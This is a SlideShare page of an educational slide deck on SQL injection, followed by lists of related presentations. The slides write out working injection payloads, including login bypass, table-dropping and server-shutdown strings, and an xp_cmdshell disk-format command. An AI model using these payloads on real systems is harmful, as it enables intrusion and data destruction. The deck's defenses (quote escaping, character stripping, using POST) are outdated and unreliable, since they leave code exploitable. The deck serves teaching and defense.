SlideShare a Scribd company logo

Sql Injection Attacks Siddhesh

Download as PPT, PDF
Siddhesh Bhobe
Siddhesh Bhobe

SQL injection attacks occur when malicious code is inserted into an SQL query, allowing attackers to read or modify data in a database. They work by exploiting insecure code that fails to properly sanitize user input. To prevent SQL injection, developers should escape quotes, remove dangerous characters from queries, limit user privileges and access, and validate all user-provided data.

1 of 26
Downloaded 341 times
SQL Injection Attacks Siddhesh Bhobe
SQL Injection Attack… … "injects" or manipulates SQL code using “string-building” techniques. By adding unexpected SQL to a query, it is possible to manipulate a database in many unanticipated ways. Attacks are successful due to poor input validation at code layer
Example 1: HTML Form Consider the following HTML form for Login: <form name=&quot;frmLogin&quot; action=&quot;login.asp&quot; method=&quot;post&quot;> Username: <input type=&quot;text&quot; name=&quot;userName&quot;> Password: <input type=&quot;text&quot; name=&quot;password&quot;> <input type=&quot;submit&quot;> </form>
Example 1: ASP Script <% … userName = Request.Form(&quot;userName“ password = Request.Form(&quot;password&quot;) query = &quot;select count(*) from users where userName='&quot; & userName & &quot;' and userPass='&quot; & password & &quot;'“ … %>
Sample Input Login =john, Password = doe select count(*) from users where userName='john' and userPass='doe'
Now check this! Login = john, Password = ' or 1=1 -- select count(*) from users where userName='john' and userPass='' or 1=1 --' Password check is nullified -- used to prevent ASP from reporting mismatched quotes
And what about this? Username: ' or 1=1 -- and Password: [Empty] select count(*) from users where userName='' or 1=1 --' and userPass=''
Example 2 Username: ' having 1=1 -- , Password: [Empty] select userName from users where userName='' having 1=1
You get a column name… You will get the following error message: Microsoft OLE DB Provider for SQL Server (0x80040E14) Column ' users.userName ' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. /login.asp, line 16
The Attack… Username: ' or users.userName like 'a%' -- select userName from users where userName='' or users.userName like 'a%' --' and userPass='' Logged In As admin!!!
Use of Semi-colon Semi-colon allows multiple queries to be specified on one line. Submitted as one batch and executed sequentially select 1; select 1+2; select 1+3;
Can you guess what happens? Username: ' or 1=1; drop table users; --
Table dropped! Username: ' or 1=1; drop table users; -- and Password: [Anything] Firstly, it would select the userName field for all rows in the users table. Secondly, it would delete the users table
SHUTDOWN WITH NOWAIT!! … causes SQL Server to shutdown, immediately stopping the Windows service Username: '; shutdown with nowait; -- select userName from users where userName=''; shutdown with nowait; --' and userPass=''
Products.asp http://localhost/products.asp?productId=1 returns Got product Pink Hoola Hoop But what about this? http://localhost/products.asp?productId=0;insert%20into%20products (prodName)%20values(left(@@version,50))
Wham! Here's the query without the URL-encoded spaces: http://localhost/products.asp?productId=0;insert into products(prodName) values(left(@@version,50)) Runs an INSERT query on the products table, adding the first 50 characters of SQL server's @@version variable as a new record in the products table.
Effects Privilege Level: sa Total control of SQL Server OS Shell at privilege of MSSQLServer service using xp_cmdshell Ability to read, write, mutilate all data
Effects Privilege Level: db_owner Read/write all data in affected database Drop tables Create new objects Take control of the database
Effects Privilege Level: normal user (no fixed server or database roles) Access objects to which permission is given At best, only some few stored procedures At worst, read/write access to all tables Recommended!
Testing for Vulnerability Disable error handling so that errors are displayed Input single quotes to see if the application fails Failure indicates poor validation and corruption of SQL
Preventing SQL Injection Attacks Limit User Access Escape Quotes Remove culprit characters Limit length of user input
Limit User Access Do not use “sa” account Removed extended SPs if you are not using them. The following are couple of the most damaging ones: xp_cmdshell xp_grantlogin Use SPs to abstract data access
Escape Quotes Convert single quotes to double quotes <% function stripQuotes(strWords) stripQuotes = replace(strWords, &quot;'&quot;, &quot;''&quot;) end function %> Converts select count(*) from users where userName='john' and userPass='' or 1=1 --' ...to this: select count(*) from users where userName='john'' and userPass=''' or 1=1 --'
Drop culprit characters Drop character sequences like ; , -- , insert and xp_ select prodName from products where id=1; xp_cmdshell 'format c: /q /yes '; drop database myDB; -- becomes select prodName from products where id=1 cmdshell ''format c: /q /yes '' database myDB
Restrict length of user input Limit length in the form field Use validating functions for numeric input Use POST, not GET
Thanks! Original Article: http://www. webmasterbase .com/article. php ?aid=794& pid =0 Also on Reismagos…
Ad

Recommended

SQL Injection
SQL Injection SQL Injection
SQL Injection
Adhoura Academy
 
D:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql InjectionD:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql Injection
avishkarm
 
Sql injection
Sql injectionSql injection
Sql injection
Hemendra Kumar
 
Sql injection
Sql injectionSql injection
Sql injection
Nikunj Dhameliya
 
Sql injection attack
Sql injection attackSql injection attack
Sql injection attack
RajKumar Rampelli
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injection
ashish20012
 
Web application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresWeb application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasures
Cade Zvavanjanja
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL Injection
Sina Manavi
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENG
Dmitry Evteev
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
Pichaya Morimoto
 
SQL Injection Defense in Python
SQL Injection Defense in PythonSQL Injection Defense in Python
SQL Injection Defense in Python
Public Broadcasting Service
 
SQL Injection in action with PHP and MySQL
SQL Injection in action with PHP and MySQLSQL Injection in action with PHP and MySQL
SQL Injection in action with PHP and MySQL
Pradeep Kumar
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injection
amiable_indian
 
Sql Injection Myths and Fallacies
Sql Injection Myths and FallaciesSql Injection Myths and Fallacies
Sql Injection Myths and Fallacies
Karwin Software Solutions LLC
 
Sql injection
Sql injectionSql injection
Sql injection
Nitish Kumar
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testing
Napendra Singh
 
What is advanced SQL Injection? Infographic
What is advanced SQL Injection? InfographicWhat is advanced SQL Injection? Infographic
What is advanced SQL Injection? Infographic
JW CyberNerd
 
Sql Injection and XSS
Sql Injection and XSSSql Injection and XSS
Sql Injection and XSS
Mike Crabb
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint Presentation
Rapid Purple
 
SQL Injection Tutorial
SQL Injection TutorialSQL Injection Tutorial
SQL Injection Tutorial
Magno Logan
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
Mentorcs
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and prevention
helloanand
 
SQL Injections (Part 1)
SQL Injections (Part 1)SQL Injections (Part 1)
SQL Injections (Part 1)
n|u - The Open Security Community
 
seminar report on Sql injection
seminar report on Sql injectionseminar report on Sql injection
seminar report on Sql injection
Jawhar Ali
 
Asp
AspAsp
Asp
Adil Jafri
 
Sql Injection Tutorial!
Sql Injection Tutorial!Sql Injection Tutorial!
Sql Injection Tutorial!
ralphmigcute
 
Sql injection attacks
Sql injection attacksSql injection attacks
Sql injection attacks
Kumar
 
SQL Injection Attacks cs586
SQL Injection Attacks cs586SQL Injection Attacks cs586
SQL Injection Attacks cs586
Stacy Watts
 
Sql injection
Sql injectionSql injection
Sql injection
Pallavi Biswas
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
Anoop T
 
Ad

More Related Content

What's hot (20)

Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENG
Dmitry Evteev
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
Pichaya Morimoto
 
SQL Injection Defense in Python
SQL Injection Defense in PythonSQL Injection Defense in Python
SQL Injection Defense in Python
Public Broadcasting Service
 
SQL Injection in action with PHP and MySQL
SQL Injection in action with PHP and MySQLSQL Injection in action with PHP and MySQL
SQL Injection in action with PHP and MySQL
Pradeep Kumar
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injection
amiable_indian
 
Sql Injection Myths and Fallacies
Sql Injection Myths and FallaciesSql Injection Myths and Fallacies
Sql Injection Myths and Fallacies
Karwin Software Solutions LLC
 
Sql injection
Sql injectionSql injection
Sql injection
Nitish Kumar
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testing
Napendra Singh
 
What is advanced SQL Injection? Infographic
What is advanced SQL Injection? InfographicWhat is advanced SQL Injection? Infographic
What is advanced SQL Injection? Infographic
JW CyberNerd
 
Sql Injection and XSS
Sql Injection and XSSSql Injection and XSS
Sql Injection and XSS
Mike Crabb
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint Presentation
Rapid Purple
 
SQL Injection Tutorial
SQL Injection TutorialSQL Injection Tutorial
SQL Injection Tutorial
Magno Logan
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
Mentorcs
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and prevention
helloanand
 
SQL Injections (Part 1)
SQL Injections (Part 1)SQL Injections (Part 1)
SQL Injections (Part 1)
n|u - The Open Security Community
 
seminar report on Sql injection
seminar report on Sql injectionseminar report on Sql injection
seminar report on Sql injection
Jawhar Ali
 
Asp
AspAsp
Asp
Adil Jafri
 
Sql Injection Tutorial!
Sql Injection Tutorial!Sql Injection Tutorial!
Sql Injection Tutorial!
ralphmigcute
 
Sql injection attacks
Sql injection attacksSql injection attacks
Sql injection attacks
Kumar
 
SQL Injection Attacks cs586
SQL Injection Attacks cs586SQL Injection Attacks cs586
SQL Injection Attacks cs586
Stacy Watts
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENG
Dmitry Evteev
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
Pichaya Morimoto
 
SQL Injection Defense in Python
SQL Injection Defense in PythonSQL Injection Defense in Python
SQL Injection Defense in Python
Public Broadcasting Service
 
SQL Injection in action with PHP and MySQL
SQL Injection in action with PHP and MySQLSQL Injection in action with PHP and MySQL
SQL Injection in action with PHP and MySQL
Pradeep Kumar
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injection
amiable_indian
 
Sql Injection Myths and Fallacies
Sql Injection Myths and FallaciesSql Injection Myths and Fallacies
Sql Injection Myths and Fallacies
Karwin Software Solutions LLC
 
Sql injection
Sql injectionSql injection
Sql injection
Nitish Kumar
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testing
Napendra Singh
 
What is advanced SQL Injection? Infographic
What is advanced SQL Injection? InfographicWhat is advanced SQL Injection? Infographic
What is advanced SQL Injection? Infographic
JW CyberNerd
 
Sql Injection and XSS
Sql Injection and XSSSql Injection and XSS
Sql Injection and XSS
Mike Crabb
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint Presentation
Rapid Purple
 
SQL Injection Tutorial
SQL Injection TutorialSQL Injection Tutorial
SQL Injection Tutorial
Magno Logan
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
Mentorcs
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and prevention
helloanand
 
SQL Injections (Part 1)
SQL Injections (Part 1)SQL Injections (Part 1)
SQL Injections (Part 1)
n|u - The Open Security Community
 
seminar report on Sql injection
seminar report on Sql injectionseminar report on Sql injection
seminar report on Sql injection
Jawhar Ali
 
Asp
AspAsp
Asp
Adil Jafri
 
Sql Injection Tutorial!
Sql Injection Tutorial!Sql Injection Tutorial!
Sql Injection Tutorial!
ralphmigcute
 
Sql injection attacks
Sql injection attacksSql injection attacks
Sql injection attacks
Kumar
 
SQL Injection Attacks cs586
SQL Injection Attacks cs586SQL Injection Attacks cs586
SQL Injection Attacks cs586
Stacy Watts
 

Viewers also liked (18)

Sql injection
Sql injectionSql injection
Sql injection
Pallavi Biswas
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
Anoop T
 
Sql Injection and Entity Frameworks
Sql Injection and Entity FrameworksSql Injection and Entity Frameworks
Sql Injection and Entity Frameworks
Rich Helton
 
Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks
Nuno Loureiro
 
Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacks
Kevin Kline
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
Marios Siganos
 
Sql injection
Sql injectionSql injection
Sql injection
Zidh
 
SQL injection and SYN attack
SQL injection and SYN attackSQL injection and SYN attack
SQL injection and SYN attack
Tesfahunegn Minwuyelet
 
SQL Injection in PHP
SQL Injection in PHPSQL Injection in PHP
SQL Injection in PHP
Dave Ross
 
03. sql and other injection module v17
03. sql and other injection module v1703. sql and other injection module v17
03. sql and other injection module v17
Eoin Keary
 
Threat modeling librarian freedom conference
Threat modeling librarian freedom conferenceThreat modeling librarian freedom conference
Threat modeling librarian freedom conference
evacide
 
Neutralizing SQL Injection in PostgreSQL
Neutralizing SQL Injection in PostgreSQLNeutralizing SQL Injection in PostgreSQL
Neutralizing SQL Injection in PostgreSQL
Juliano Atanazio
 
SQL Injection - The Unknown Story
SQL Injection - The Unknown StorySQL Injection - The Unknown Story
SQL Injection - The Unknown Story
Imperva
 
SQL injection
SQL injectionSQL injection
SQL injection
Akash Panchal
 
Introduction to SQL Injection
Introduction to SQL InjectionIntroduction to SQL Injection
Introduction to SQL Injection
jpubal
 
Sql injection
Sql injectionSql injection
Sql injection
Sasha-Leigh Garret
 
Defcon 17-joseph mccray-adv-sql_injection
Defcon 17-joseph mccray-adv-sql_injectionDefcon 17-joseph mccray-adv-sql_injection
Defcon 17-joseph mccray-adv-sql_injection
Ahmed AbdelSatar
 
Website attack n defacement n its control measures
Website attack n defacement n its control measures Website attack n defacement n its control measures
Website attack n defacement n its control measures
أحلام انصارى
 
Sql injection
Sql injectionSql injection
Sql injection
Pallavi Biswas
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
Anoop T
 
Sql Injection and Entity Frameworks
Sql Injection and Entity FrameworksSql Injection and Entity Frameworks
Sql Injection and Entity Frameworks
Rich Helton
 
Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks
Nuno Loureiro
 
Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacks
Kevin Kline
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
Marios Siganos
 
Sql injection
Sql injectionSql injection
Sql injection
Zidh
 
SQL injection and SYN attack
SQL injection and SYN attackSQL injection and SYN attack
SQL injection and SYN attack
Tesfahunegn Minwuyelet
 
SQL Injection in PHP
SQL Injection in PHPSQL Injection in PHP
SQL Injection in PHP
Dave Ross
 
03. sql and other injection module v17
03. sql and other injection module v1703. sql and other injection module v17
03. sql and other injection module v17
Eoin Keary
 
Threat modeling librarian freedom conference
Threat modeling librarian freedom conferenceThreat modeling librarian freedom conference
Threat modeling librarian freedom conference
evacide
 
Neutralizing SQL Injection in PostgreSQL
Neutralizing SQL Injection in PostgreSQLNeutralizing SQL Injection in PostgreSQL
Neutralizing SQL Injection in PostgreSQL
Juliano Atanazio
 
SQL Injection - The Unknown Story
SQL Injection - The Unknown StorySQL Injection - The Unknown Story
SQL Injection - The Unknown Story
Imperva
 
SQL injection
SQL injectionSQL injection
SQL injection
Akash Panchal
 
Introduction to SQL Injection
Introduction to SQL InjectionIntroduction to SQL Injection
Introduction to SQL Injection
jpubal
 
Sql injection
Sql injectionSql injection
Sql injection
Sasha-Leigh Garret
 
Defcon 17-joseph mccray-adv-sql_injection
Defcon 17-joseph mccray-adv-sql_injectionDefcon 17-joseph mccray-adv-sql_injection
Defcon 17-joseph mccray-adv-sql_injection
Ahmed AbdelSatar
 
Website attack n defacement n its control measures
Website attack n defacement n its control measures Website attack n defacement n its control measures
Website attack n defacement n its control measures
أحلام انصارى
 
Ad

Similar to Sql Injection Attacks Siddhesh (20)

12-security.ppt - PHP and Arabic Language - Index
12-security.ppt - PHP and Arabic Language - Index12-security.ppt - PHP and Arabic Language - Index
12-security.ppt - PHP and Arabic Language - Index
webhostingguy
 
Security.ppt
Security.pptSecurity.ppt
Security.ppt
webhostingguy
 
Joomla security nuggets
Joomla security nuggetsJoomla security nuggets
Joomla security nuggets
guestbd1cdca
 
SQL Injection Attacks
SQL Injection AttacksSQL Injection Attacks
SQL Injection Attacks
Compare Infobase Limited
 
How did i steal your database
How did i steal your databaseHow did i steal your database
How did i steal your database
Mostafa Siraj
 
Web Security
Web SecurityWeb Security
Web Security
Supankar Banik
 
Playing With (B)Sqli
Playing With (B)SqliPlaying With (B)Sqli
Playing With (B)Sqli
Chema Alonso
 
Concern of Web Application Security
Concern of Web Application SecurityConcern of Web Application Security
Concern of Web Application Security
Mahmud Ahsan
 
secure php
secure phpsecure php
secure php
Riyad Bin Zaman
 
General Principles of Web Security
General Principles of Web SecurityGeneral Principles of Web Security
General Principles of Web Security
jemond
 
Sql Injection Attacks And Defense Presentatio (1)
Sql Injection Attacks And Defense Presentatio (1)Sql Injection Attacks And Defense Presentatio (1)
Sql Injection Attacks And Defense Presentatio (1)
guest32e5cfe
 
Boston Computing Review - Ruby on Rails
Boston Computing Review - Ruby on RailsBoston Computing Review - Ruby on Rails
Boston Computing Review - Ruby on Rails
John Brunswick
 
Sql Injection
Sql Injection Sql Injection
Sql Injection
Sanjeev Kumar Jaiswal
 
Sql Injection Adv Owasp
Sql Injection Adv OwaspSql Injection Adv Owasp
Sql Injection Adv Owasp
Aung Khant
 
Open Source Package Php Mysql 1228203701094763 9
Open Source Package Php Mysql 1228203701094763 9Open Source Package Php Mysql 1228203701094763 9
Open Source Package Php Mysql 1228203701094763 9
isadorta
 
Open Source Package PHP & MySQL
Open Source Package PHP & MySQLOpen Source Package PHP & MySQL
Open Source Package PHP & MySQL
kalaisai
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
Balavignesh Kasinathan
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security Vulnerabilities
Carol McDonald
 
2009 Barcamp Nashville Web Security 101
2009 Barcamp Nashville Web Security 1012009 Barcamp Nashville Web Security 101
2009 Barcamp Nashville Web Security 101
brian_dailey
 
Web Security Mistakes: Trusting The Client
Web Security Mistakes: Trusting The ClientWeb Security Mistakes: Trusting The Client
Web Security Mistakes: Trusting The Client
grutz
 
12-security.ppt - PHP and Arabic Language - Index
12-security.ppt - PHP and Arabic Language - Index12-security.ppt - PHP and Arabic Language - Index
12-security.ppt - PHP and Arabic Language - Index
webhostingguy
 
Security.ppt
Security.pptSecurity.ppt
Security.ppt
webhostingguy
 
Joomla security nuggets
Joomla security nuggetsJoomla security nuggets
Joomla security nuggets
guestbd1cdca
 
SQL Injection Attacks
SQL Injection AttacksSQL Injection Attacks
SQL Injection Attacks
Compare Infobase Limited
 
How did i steal your database
How did i steal your databaseHow did i steal your database
How did i steal your database
Mostafa Siraj
 
Web Security
Web SecurityWeb Security
Web Security
Supankar Banik
 
Playing With (B)Sqli
Playing With (B)SqliPlaying With (B)Sqli
Playing With (B)Sqli
Chema Alonso
 
Concern of Web Application Security
Concern of Web Application SecurityConcern of Web Application Security
Concern of Web Application Security
Mahmud Ahsan
 
secure php
secure phpsecure php
secure php
Riyad Bin Zaman
 
General Principles of Web Security
General Principles of Web SecurityGeneral Principles of Web Security
General Principles of Web Security
jemond
 
Sql Injection Attacks And Defense Presentatio (1)
Sql Injection Attacks And Defense Presentatio (1)Sql Injection Attacks And Defense Presentatio (1)
Sql Injection Attacks And Defense Presentatio (1)
guest32e5cfe
 
Boston Computing Review - Ruby on Rails
Boston Computing Review - Ruby on RailsBoston Computing Review - Ruby on Rails
Boston Computing Review - Ruby on Rails
John Brunswick
 
Sql Injection
Sql Injection Sql Injection
Sql Injection
Sanjeev Kumar Jaiswal
 
Sql Injection Adv Owasp
Sql Injection Adv OwaspSql Injection Adv Owasp
Sql Injection Adv Owasp
Aung Khant
 
Open Source Package Php Mysql 1228203701094763 9
Open Source Package Php Mysql 1228203701094763 9Open Source Package Php Mysql 1228203701094763 9
Open Source Package Php Mysql 1228203701094763 9
isadorta
 
Open Source Package PHP & MySQL
Open Source Package PHP & MySQLOpen Source Package PHP & MySQL
Open Source Package PHP & MySQL
kalaisai
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
Balavignesh Kasinathan
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security Vulnerabilities
Carol McDonald
 
2009 Barcamp Nashville Web Security 101
2009 Barcamp Nashville Web Security 1012009 Barcamp Nashville Web Security 101
2009 Barcamp Nashville Web Security 101
brian_dailey
 
Web Security Mistakes: Trusting The Client
Web Security Mistakes: Trusting The ClientWeb Security Mistakes: Trusting The Client
Web Security Mistakes: Trusting The Client
grutz
 
Ad

More from Siddhesh Bhobe (16)

eMee at HR Tech Europe, 26 March, London
eMee at HR Tech Europe, 26 March, LondoneMee at HR Tech Europe, 26 March, London
eMee at HR Tech Europe, 26 March, London
Siddhesh Bhobe
 
Industry expectations from new recruits
Industry expectations from new recruitsIndustry expectations from new recruits
Industry expectations from new recruits
Siddhesh Bhobe
 
The eMee Value Proposition
The eMee Value PropositionThe eMee Value Proposition
The eMee Value Proposition
Siddhesh Bhobe
 
Redefining Employee Engagement
Redefining Employee EngagementRedefining Employee Engagement
Redefining Employee Engagement
Siddhesh Bhobe
 
Introduction to eMee
Introduction to eMeeIntroduction to eMee
Introduction to eMee
Siddhesh Bhobe
 
Tour Of Europe
Tour Of EuropeTour Of Europe
Tour Of Europe
Siddhesh Bhobe
 
Software As Solutions
Software As SolutionsSoftware As Solutions
Software As Solutions
Siddhesh Bhobe
 
Effective ALM
Effective ALMEffective ALM
Effective ALM
Siddhesh Bhobe
 
Bit Vectors Siddhesh
Bit Vectors SiddheshBit Vectors Siddhesh
Bit Vectors Siddhesh
Siddhesh Bhobe
 
Anti Patterns Siddhesh Lecture1 Of3
Anti Patterns Siddhesh Lecture1 Of3Anti Patterns Siddhesh Lecture1 Of3
Anti Patterns Siddhesh Lecture1 Of3
Siddhesh Bhobe
 
Introduction To Dot Net Siddhesh
Introduction To Dot Net SiddheshIntroduction To Dot Net Siddhesh
Introduction To Dot Net Siddhesh
Siddhesh Bhobe
 
Ruby On Rails Siddhesh
Ruby On Rails SiddheshRuby On Rails Siddhesh
Ruby On Rails Siddhesh
Siddhesh Bhobe
 
Six Thinking Hats Siddhesh
Six Thinking Hats SiddheshSix Thinking Hats Siddhesh
Six Thinking Hats Siddhesh
Siddhesh Bhobe
 
Anti Patterns Siddhesh Lecture2 Of3
Anti Patterns Siddhesh Lecture2 Of3Anti Patterns Siddhesh Lecture2 Of3
Anti Patterns Siddhesh Lecture2 Of3
Siddhesh Bhobe
 
Software Accessibility Siddhesh
Software Accessibility SiddheshSoftware Accessibility Siddhesh
Software Accessibility Siddhesh
Siddhesh Bhobe
 
Anti Patterns Siddhesh Lecture3 Of3
Anti Patterns Siddhesh Lecture3 Of3Anti Patterns Siddhesh Lecture3 Of3
Anti Patterns Siddhesh Lecture3 Of3
Siddhesh Bhobe
 
eMee at HR Tech Europe, 26 March, London
eMee at HR Tech Europe, 26 March, LondoneMee at HR Tech Europe, 26 March, London
eMee at HR Tech Europe, 26 March, London
Siddhesh Bhobe
 
Industry expectations from new recruits
Industry expectations from new recruitsIndustry expectations from new recruits
Industry expectations from new recruits
Siddhesh Bhobe
 
The eMee Value Proposition
The eMee Value PropositionThe eMee Value Proposition
The eMee Value Proposition
Siddhesh Bhobe
 
Redefining Employee Engagement
Redefining Employee EngagementRedefining Employee Engagement
Redefining Employee Engagement
Siddhesh Bhobe
 
Introduction to eMee
Introduction to eMeeIntroduction to eMee
Introduction to eMee
Siddhesh Bhobe
 
Tour Of Europe
Tour Of EuropeTour Of Europe
Tour Of Europe
Siddhesh Bhobe
 
Software As Solutions
Software As SolutionsSoftware As Solutions
Software As Solutions
Siddhesh Bhobe
 
Effective ALM
Effective ALMEffective ALM
Effective ALM
Siddhesh Bhobe
 
Bit Vectors Siddhesh
Bit Vectors SiddheshBit Vectors Siddhesh
Bit Vectors Siddhesh
Siddhesh Bhobe
 
Anti Patterns Siddhesh Lecture1 Of3
Anti Patterns Siddhesh Lecture1 Of3Anti Patterns Siddhesh Lecture1 Of3
Anti Patterns Siddhesh Lecture1 Of3
Siddhesh Bhobe
 
Introduction To Dot Net Siddhesh
Introduction To Dot Net SiddheshIntroduction To Dot Net Siddhesh
Introduction To Dot Net Siddhesh
Siddhesh Bhobe
 
Ruby On Rails Siddhesh
Ruby On Rails SiddheshRuby On Rails Siddhesh
Ruby On Rails Siddhesh
Siddhesh Bhobe
 
Six Thinking Hats Siddhesh
Six Thinking Hats SiddheshSix Thinking Hats Siddhesh
Six Thinking Hats Siddhesh
Siddhesh Bhobe
 
Anti Patterns Siddhesh Lecture2 Of3
Anti Patterns Siddhesh Lecture2 Of3Anti Patterns Siddhesh Lecture2 Of3
Anti Patterns Siddhesh Lecture2 Of3
Siddhesh Bhobe
 
Software Accessibility Siddhesh
Software Accessibility SiddheshSoftware Accessibility Siddhesh
Software Accessibility Siddhesh
Siddhesh Bhobe
 
Anti Patterns Siddhesh Lecture3 Of3
Anti Patterns Siddhesh Lecture3 Of3Anti Patterns Siddhesh Lecture3 Of3
Anti Patterns Siddhesh Lecture3 Of3
Siddhesh Bhobe
 

Recently uploaded (20)

AI and Data Privacy in 2025: Global Trends
AI and Data Privacy in 2025: Global TrendsAI and Data Privacy in 2025: Global Trends
AI and Data Privacy in 2025: Global Trends
InData Labs
 
Andrew Marnell: Transforming Business Strategy Through Data-Driven Insights
Andrew Marnell: Transforming Business Strategy Through Data-Driven InsightsAndrew Marnell: Transforming Business Strategy Through Data-Driven Insights
Andrew Marnell: Transforming Business Strategy Through Data-Driven Insights
Andrew Marnell
 
Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...
Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...
Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...
Noah Loul
 
UiPath Community Berlin: Orchestrator API, Swagger, and Test Manager API
UiPath Community Berlin: Orchestrator API, Swagger, and Test Manager APIUiPath Community Berlin: Orchestrator API, Swagger, and Test Manager API
UiPath Community Berlin: Orchestrator API, Swagger, and Test Manager API
UiPathCommunity
 
Designing Low-Latency Systems with Rust and ScyllaDB: An Architectural Deep Dive
Designing Low-Latency Systems with Rust and ScyllaDB: An Architectural Deep DiveDesigning Low-Latency Systems with Rust and ScyllaDB: An Architectural Deep Dive
Designing Low-Latency Systems with Rust and ScyllaDB: An Architectural Deep Dive
ScyllaDB
 
Top 10 IT Help Desk Outsourcing Services
Top 10 IT Help Desk Outsourcing ServicesTop 10 IT Help Desk Outsourcing Services
Top 10 IT Help Desk Outsourcing Services
Infrassist Technologies Pvt. Ltd.
 
Web and Graphics Designing Training in Rajpura
Web and Graphics Designing Training in RajpuraWeb and Graphics Designing Training in Rajpura
Web and Graphics Designing Training in Rajpura
Erginous Technology
 
Manifest Pre-Seed Update | A Humanoid OEM Deeptech In France
Manifest Pre-Seed Update | A Humanoid OEM Deeptech In FranceManifest Pre-Seed Update | A Humanoid OEM Deeptech In France
Manifest Pre-Seed Update | A Humanoid OEM Deeptech In France
chb3
 
How analogue intelligence complements AI
How analogue intelligence complements AIHow analogue intelligence complements AI
How analogue intelligence complements AI
Paul Rowe
 
Role of Data Annotation Services in AI-Powered Manufacturing
Role of Data Annotation Services in AI-Powered ManufacturingRole of Data Annotation Services in AI-Powered Manufacturing
Role of Data Annotation Services in AI-Powered Manufacturing
Andrew Leo
 
Procurement Insights Cost To Value Guide.pptx
Procurement Insights Cost To Value Guide.pptxProcurement Insights Cost To Value Guide.pptx
Procurement Insights Cost To Value Guide.pptx
Jon Hansen
 
Dev Dives: Automate and orchestrate your processes with UiPath Maestro
Dev Dives: Automate and orchestrate your processes with UiPath MaestroDev Dives: Automate and orchestrate your processes with UiPath Maestro
Dev Dives: Automate and orchestrate your processes with UiPath Maestro
UiPathCommunity
 
AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...
AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...
